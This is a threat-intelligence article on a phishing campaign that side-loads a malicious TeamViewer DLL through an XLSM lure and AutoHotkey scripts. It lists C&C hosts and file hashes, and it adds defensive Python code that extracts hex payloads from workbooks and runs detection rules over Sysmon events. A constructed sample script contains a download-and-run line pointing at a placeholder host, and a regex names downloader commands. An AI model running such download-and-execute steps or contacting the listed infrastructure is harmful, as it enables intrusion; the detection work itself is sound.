TeamViewer is a well-known tool for remote desktop control, desktop sharing, online meetings, web conferencing and file transfer. Based on the entire infection chain, the tools and tactics used in this attack, and the related underground activity, the researchers believe the attack was carried out by a financially motivated Russian-speaking actor. Recent malicious campaigns keep abusing TeamViewer to deliver powerful malware that steals sensitive information and money from various government and financial networks by means of a malicious TeamViewer DLL.
## Weaponized TeamViewer Infection Chain
The initial stage of the infection chain starts with a spam email carrying a malicious XLSM attachment with embedded macros, titled "Military Financing Program". Purporting to come from the US Department of State, it is a well-crafted malicious document marked "Top Secret" to persuade the victim to open it. Once the victim opens the macro lure, the XLSM document pulls two files out of hex-encoded cells. The first is a legitimate AutoHotkeyU32.exe program; the second is AutoHotkeyU32.ahk, an AHK script that communicates with the C&C server and downloads and executes additional scripts.
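The drop technique just described (payloads stored as hex strings in spreadsheet cells) is easy to check for from the analyst's side, because an XLSM file is a zip of XML parts. The following is an added example written for this article, not code from the campaign or from Check Point: it opens a workbook as a zip, walks every string-valued cell, decodes any long hex run and classifies what came out. The workbook built by `build_sample_workbook()` is constructed for the demo; its fake PE header and AHK text stand in for AutoHotkeyU32.exe and AutoHotkeyU32.ahk, and the URL inside it is an invented placeholder.

```python
"""Extract hex-encoded payloads from the cells of an .xlsm/.xlsx workbook.

Added example for this article (not code from the campaign or Check Point).
The sample workbook and the payloads inside it are constructed stand-ins.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

MAIN_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS = {"m": MAIN_NS}
# At least 16 bytes of even-length hex; short hex-looking values are ignored.
HEX_RE = re.compile(r"^(?:[0-9A-Fa-f]{2}){16,}$")
# AHK directives/commands typical of a dropper or downloader script.
AHK_RE = re.compile(r"(?im)^\s*(#NoTrayIcon|#Persistent|#Include|Run\b|RunWait\b|"
                    r"FileInstall|UrlDownloadToFile|DllCall)")


def _text_of(elem):
    """Concatenate all <t> runs under an <si> or <is> element."""
    return "".join(t.text or "" for t in elem.iter("{%s}t" % MAIN_NS))


def iter_cell_strings(xlsm_bytes):
    """Yield (sheet_path, cell_ref, text) for every string-valued cell."""
    with zipfile.ZipFile(io.BytesIO(xlsm_bytes)) as zf:
        names = zf.namelist()
        shared = []
        if "xl/sharedStrings.xml" in names:
            root = ET.fromstring(zf.read("xl/sharedStrings.xml"))
            shared = [_text_of(si) for si in root.findall("m:si", NS)]
        for name in names:
            if not (name.startswith("xl/worksheets/sheet") and name.endswith(".xml")):
                continue
            root = ET.fromstring(zf.read(name))
            for c in root.iter("{%s}c" % MAIN_NS):
                kind = c.get("t")
                v = c.find("m:v", NS)
                if kind == "s" and v is not None and v.text is not None:
                    yield name, c.get("r"), shared[int(v.text)]   # shared-string index
                elif kind == "inlineStr":
                    yield name, c.get("r"), _text_of(c)
                elif kind == "str" and v is not None and v.text is not None:
                    yield name, c.get("r"), v.text


def classify(blob):
    """Rough content type of a decoded blob: pe, ahk, text or binary."""
    if blob[:2] == b"MZ":
        return "pe"
    try:
        text = blob.decode("ascii")
    except UnicodeDecodeError:
        return "binary"
    return "ahk" if AHK_RE.search(text) else "text"


def extract_hex_payloads(xlsm_bytes):
    """Return one dict per cell whose value is a long hex string."""
    hits = []
    for sheet, ref, text in iter_cell_strings(xlsm_bytes):
        value = text.strip()
        if HEX_RE.match(value):
            blob = bytes.fromhex(value)
            hits.append({"sheet": sheet, "cell": ref, "size": len(blob),
                         "kind": classify(blob)})
    return hits


def build_sample_workbook():
    """Constructed stand-in for the lure: title in A1, hex payloads in A2/A3."""
    fake_pe = b"MZ\x90\x00" + b"\x00" * 56 + b"PE\x00\x00"      # not a real executable
    fake_ahk = (b"#NoTrayIcon\n#Persistent\n"
                b"UrlDownloadToFile, http://example.invalid/htv.ahk, %A_Temp%\\htv.ahk\n"
                b"Run, AutoHotkeyU32.exe %A_Temp%\\htv.ahk\n")
    shared = ('<?xml version="1.0" encoding="UTF-8"?>'
              '<sst xmlns="%s"><si><t>%s</t></si><si><t>%s</t></si></sst>'
              % (MAIN_NS, fake_pe.hex(), fake_ahk.hex()))
    sheet = ('<?xml version="1.0" encoding="UTF-8"?>'
             '<worksheet xmlns="%s"><sheetData>'
             '<row r="1"><c r="A1" t="inlineStr"><is><t>Military Financing Program</t></is></c></row>'
             '<row r="2"><c r="A2" t="s"><v>0</v></c></row>'
             '<row r="3"><c r="A3" t="s"><v>1</v></c></row>'
             '</sheetData></worksheet>' % MAIN_NS)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("xl/sharedStrings.xml", shared)
        zf.writestr("xl/worksheets/sheet1.xml", sheet)
    return buf.getvalue()


if __name__ == "__main__":
    for hit in extract_hex_payloads(build_sample_workbook()):
        print(hit)
```

Run against a real sample, `extract_hex_payloads(open("lure.xlsm", "rb").read())` lists which cells carry a PE and which carry a script, without executing the macro; the macro itself (in `xl/vbaProject.bin`) still has to be examined separately to see how the cells are read and where the files are written.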
Three malicious AHK scripts exist, each able to carry out different actions. In this case the threat actor used the TeamViewer DLL side-loading technique (htv.ahk), which lets the attacker add more functionality to TeamViewer. The technique is used to hide the TeamViewer interface so the victim does not see it, to save the current TeamViewer session credentials to a text file, and to enable the transfer and execution of additional EXE or DLL files.
[Figure: remote execution of the payload]

According to Check Point Research, once the malicious TeamViewer provides remote access, one of the first uses of the AutoHotKey scripts is to upload a screenshot from the infected PC. Based on telemetry records, the attack targeted countries such as Nepal, Guyana, Kenya, Italy, Liberia, Bermuda and Lebanon, focusing on public-sector finance and public officials.

## Indicators of Compromise

DLLs:

- 013e87b874477fcad54ada4fa0a274a2
- 799AB035023B655506C0D565996579B5
- e1167cb7f3735d4edec5f7219cea64ef
- 6cc0218d2b93a243721b088f177d8e8f
- aad0d93a570e6230f843dcdf20041e1e
- 1e741ebc08af09edc69f017e170b9852
- c6ae889f3bee42cc19a728ba66fa3d99
- 1675cdec4c0ff49993a1fcbdfad85e56
- 72de32fa52cc2fab2b0584c26657820f
- 44038b936667f6ce2333af80086f877f

Documents:

- 4acf624ad87609d476180ecc4c96c355
- 4dbe9dbfb53438d9ce410535355cd973

C&Cs:

- 1c-ru[.]net/check/license
- intersys32[.]com/3307/
- 146.0.72[.]180/3307/
- 146.0.72[.]180/newcpanel_gate/gate.php
- 185.70.186[.]145/gate.php
- 185.70.186[.]145/index.php
- 193.109.69[.]5/3307/gate.php
- 193.109.69[.]5/9125/gate.php
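The indicators above are only useful once they are matched against endpoint telemetry, and the side-loading chain described earlier (Office spawning AutoHotkey, TeamViewer loading a DLL from a user-writable directory) can be caught even when the hashes change. The following is an added example written for this article, not tooling from Check Point or from the campaign: a small set of detection rules run over constructed Sysmon-style event records. The hash and host sets are the IoCs listed above with the defanging brackets removed; the event records, paths, the DLL name `tv_side.dll` and every hash other than the listed MD5s are invented for the demo.

```python
"""Detection rules for the TeamViewer DLL side-loading chain over
Sysmon-style events. Added example for this article; events are constructed."""
import ntpath

IOC_DLL_MD5 = {
    "013e87b874477fcad54ada4fa0a274a2", "799ab035023b655506c0d565996579b5",
    "e1167cb7f3735d4edec5f7219cea64ef", "6cc0218d2b93a243721b088f177d8e8f",
    "aad0d93a570e6230f843dcdf20041e1e", "1e741ebc08af09edc69f017e170b9852",
    "c6ae889f3bee42cc19a728ba66fa3d99", "1675cdec4c0ff49993a1fcbdfad85e56",
    "72de32fa52cc2fab2b0584c26657820f", "44038b936667f6ce2333af80086f877f",
}
IOC_DOC_MD5 = {"4acf624ad87609d476180ecc4c96c355", "4dbe9dbfb53438d9ce410535355cd973"}
IOC_C2_HOSTS = {"1c-ru.net", "intersys32.com", "146.0.72.180",
                "185.70.186.145", "193.109.69.5"}
# Directories a phishing payload can write to without admin rights.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}


def parse_hashes(field):
    """Sysmon hash field ('MD5=..,SHA256=..') -> {'md5': .., 'sha256': ..}, lower-cased."""
    out = {}
    for part in field.split(","):
        if "=" in part:
            algo, value = part.split("=", 1)
            out[algo.strip().lower()] = value.strip().lower()
    return out


def in_user_writable(path):
    return any(marker in path.lower() for marker in USER_WRITABLE)


def check_event(ev):
    """Return the list of alert strings raised by one event."""
    alerts = []
    image = ntpath.basename(ev.get("Image", "")).lower()
    if ev["EventID"] == 1:  # process creation
        parent = ntpath.basename(ev.get("ParentImage", "")).lower()
        cmd = ev.get("CommandLine", "")
        if image.startswith("autohotkey") and parent in OFFICE_APPS:
            alerts.append("Office application spawned AutoHotkey: " + cmd)
        if image.startswith("autohotkey") and ".ahk" in cmd.lower() and in_user_writable(cmd):
            alerts.append("AutoHotkey running a script from a user-writable path: " + cmd)
        if image == "teamviewer.exe" and in_user_writable(ev.get("Image", "")):
            alerts.append("TeamViewer started from a user-writable path: " + ev["Image"])
    elif ev["EventID"] == 7:  # image (DLL) load
        loaded = ev.get("ImageLoaded", "")
        md5 = parse_hashes(ev.get("Hashes", "")).get("md5")
        if md5 in IOC_DLL_MD5:
            alerts.append("known malicious TeamViewer DLL loaded: %s (md5 %s)" % (loaded, md5))
        if image == "teamviewer.exe" and loaded.lower().endswith(".dll") and in_user_writable(loaded):
            alerts.append("TeamViewer side-loaded a DLL from a user-writable path: " + loaded)
    elif ev["EventID"] == 3:  # network connection
        dest = ev.get("DestinationHostname", "").lower() or ev.get("DestinationIp", "")
        if dest in IOC_C2_HOSTS or ev.get("DestinationIp", "") in IOC_C2_HOSTS:
            alerts.append("connection to known C&C %s from %s" % (dest, image))
    elif ev["EventID"] == 15:  # file stream created, e.g. a saved attachment
        md5 = parse_hashes(ev.get("Hash", "")).get("md5")
        if md5 in IOC_DOC_MD5:
            alerts.append("known lure document written: " + ev.get("TargetFilename", ""))
    return alerts


def scan(events):
    return [alert for ev in events for alert in check_event(ev)]


SAMPLE_EVENTS = [  # constructed for the demo; not real telemetry
    {"EventID": 15, "Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "TargetFilename": r"C:\Users\victim\Downloads\Military Financing Program.xlsm",
     "Hash": "MD5=4ACF624AD87609D476180ECC4C96C355"},
    {"EventID": 1, "Image": r"C:\Users\victim\AppData\Roaming\AutoHotkeyU32.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": r"AutoHotkeyU32.exe C:\Users\victim\AppData\Roaming\AutoHotkeyU32.ahk"},
    {"EventID": 7, "Image": r"C:\Users\victim\AppData\Roaming\TeamViewer\TeamViewer.exe",
     "ImageLoaded": r"C:\Users\victim\AppData\Roaming\TeamViewer\tv_side.dll",
     "Hashes": "MD5=013E87B874477FCAD54ADA4FA0A274A2,SHA256=" + "0" * 64},
    {"EventID": 3, "Image": r"C:\Users\victim\AppData\Roaming\TeamViewer\TeamViewer.exe",
     "DestinationIp": "146.0.72.180", "DestinationPort": 80},
    {"EventID": 7, "Image": r"C:\Program Files\TeamViewer\TeamViewer.exe",  # benign
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Hashes": "MD5=" + "f" * 32 + ",SHA256=" + "f" * 64},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",  # benign
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The hash and host rules are the brittle part: a recompiled DLL or a new C&C defeats them. The structural rules (an Office process launching AutoHotkey, an `.ahk` script or TeamViewer itself running out of AppData, TeamViewer loading a DLL from a user-writable directory) describe the technique rather than one sample and are the ones worth keeping after this campaign's indicators have aged out.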